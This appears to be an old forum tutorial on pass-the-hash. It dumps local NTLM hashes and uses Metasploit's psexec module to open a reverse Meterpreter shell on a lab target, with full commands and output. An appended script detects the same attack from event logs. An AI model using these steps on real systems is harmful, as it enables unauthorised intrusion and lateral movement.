Logging in to Windows directly with a hash

Views: 299 | Replies: 0 | 2012-4-1 19:21:37
In penetration work against network administrators today, what do we do when we have obtained the administrator's hash, but the disk is small, the bandwidth low and the box underpowered, so the hash simply cannot be cracked?
I'll go straight to the procedure... There are plenty of articles online about pass-the-hash attacks, so I won't repeat them. The scenario demonstrated here is especially suited to internal network penetration: once we have administrative control of one server, we move on to the other servers in the intranet.

The usual first step is to grab the administrator password of the server we already hold and try it against the target server, but what if it cannot be cracked? We can use a pass-the-hash attack and log in to the target host with the hash directly, because what the machine actually needs from us is a valid hash that carries the right privileges; all the complicated math and encryption behind it is not our problem~

Enough talk, on with the demo. First, on my own PC (taken as the target host),

I create a new user isosky, set a password for it, and then obtain the hashes with the usual tools:


C:\>net user isosky test

The command completed successfully.


C:\>gethashes.exe $local

1:1007:C2265B23734E0DACAAD3B435B51404EE:69943C5E63B4D2C104DBBCC15138B72B:::
Administrator:500:0A174C1272FCBCF7804E0502081BA8AE:83F36A86631180CB9F5F53F5F45DFB2B:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
HelpAssistant:1000:CF88594C2AC20629EEF3D6DABD2DA92D:0FCE98570CBB9C14E8FF200353B2707B:::
isosky:1003:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B51404EE:F9E8AE6C7229EA07EFAC12715F954B83:::
__vmware_user__:1006:AAD3B435B51404EEAAD3B435B51404EE:915D1CEE456EA4DD6A8094F7CE094448:::

C:\>
Then I go back to my BT (BackTrack) virtual machine (the attacker host) and test with MSF; the PSEXEC module that ships with MSF supports pass-the-hash.
root@bt:~# msfconsole


       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12536 updated 76 days ago (2011.05.04)

Warning: This copy of the Metasploit Framework was last updated 76 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > set RHOST 192.168.0.254
RHOST => 192.168.0.254
msf exploit(psexec) > set SMBUser isosky
SMBUser => isosky
msf exploit(psexec) > set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
SMBPass => 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting                                                    Required  Description
   ----       ---------------                                                    --------  -----------
   RHOST      192.168.0.254                                                      yes       The target address
   RPORT      445                                                                yes       Set the SMB service port
   SHARE      ADMIN$                                                             yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP                                                          no        The Windows domain to use for authentication
   SMBPass    01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537  no        The password for the specified username
   SMBUser    isosky                                                             no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.0.254:445|WORKGROUP as user 'isosky'...
[*] Uploading payload...
[*] Created \UGdecsam.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (MZsCnzjn - "MrZdoQwIlbBIYZQJyumxYX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \UGdecsam.exe...
[*] Sending stage (749056 bytes) to 192.168.0.254
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.254:1877) at 2011-07-19 03:57:17 +0800

meterpreter > sysinfo
Computer        : ISOSKY-PC
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32

meterpreter > shell
Process 4596 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
__vmware_user__          1                        Administrator
Guest                    HelpAssistant            isosky
SUPPORT_388945a0
The command completed with one or more errors.


C:\WINDOWS\system32>
With that, we have successfully obtained a CMD shell on the target. Isn't it simple?
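The psexec run above leaves a recognisable trail on the target: a network NTLM logon, then a service with a random 8-letter name whose binary was dropped into the ADMIN$ root and removed seconds later. The script below is an added detection example, not part of the original post; it assumes modern Windows event IDs (4624 for logons, 7045 for service installs), constructed event records with simplified field names, and correlates the two artifacts.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not from the original post), modelled on the trace above:
# an NTLM network logon followed seconds later by a random-named service whose binary
# sits directly in the ADMIN$ root, then an unrelated Kerberos logon and a normal service.
EVENTS = [
    {"time": "2011-07-19 03:57:10", "id": 4624, "LogonType": 3, "AuthPackage": "NTLM",
     "User": "isosky", "Src": "192.168.0.3"},
    {"time": "2011-07-19 03:57:12", "id": 7045, "ServiceName": "MZsCnzjn",
     "ImagePath": "%SystemRoot%\\UGdecsam.exe"},
    {"time": "2011-07-19 03:57:14", "id": 7036, "ServiceName": "MZsCnzjn", "State": "stopped"},
    {"time": "2011-07-19 04:10:00", "id": 4624, "LogonType": 3, "AuthPackage": "Kerberos",
     "User": "backup", "Src": "192.168.0.7"},
    {"time": "2011-07-19 04:30:00", "id": 7045, "ServiceName": "Spooler",
     "ImagePath": "%SystemRoot%\\System32\\spoolsv.exe"},
]

# Binary dropped straight into the share root (ADMIN$ maps to %SystemRoot%), not a subfolder.
ADMIN_ROOT_EXE = re.compile(r"^%SystemRoot%\\[^\\]+\.exe$", re.IGNORECASE)
# psexec-style service names are 8 random letters.
RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")
WINDOW = timedelta(seconds=60)  # assumed correlation window


def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")


def suspicious_service(ev):
    """True for a 7045 whose image lives in the ADMIN$ root and whose name looks random."""
    return (ev["id"] == 7045
            and ADMIN_ROOT_EXE.match(ev["ImagePath"]) is not None
            and RANDOM_NAME.match(ev["ServiceName"]) is not None)


def find_pth_psexec(events, window=WINDOW):
    """Return (user, src, service, image) tuples where a network NTLM logon is followed
    within `window` by a suspicious service install."""
    hits = []
    ntlm_logons = [e for e in events if e["id"] == 4624 and e["LogonType"] == 3
                   and e["AuthPackage"].upper() == "NTLM"]
    for svc in filter(suspicious_service, events):
        t_svc = parse(svc["time"])
        for lg in ntlm_logons:
            if timedelta(0) <= t_svc - parse(lg["time"]) <= window:
                hits.append((lg["User"], lg["Src"], svc["ServiceName"], svc["ImagePath"]))
    return hits


if __name__ == "__main__":
    for h in find_pth_psexec(EVENTS):
        print("possible pass-the-hash + psexec: user=%s src=%s service=%s image=%s" % h)
```

NTLM network logons alone are normal on most networks; the service-install artifact within seconds of the logon is what makes the pair worth alerting on.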
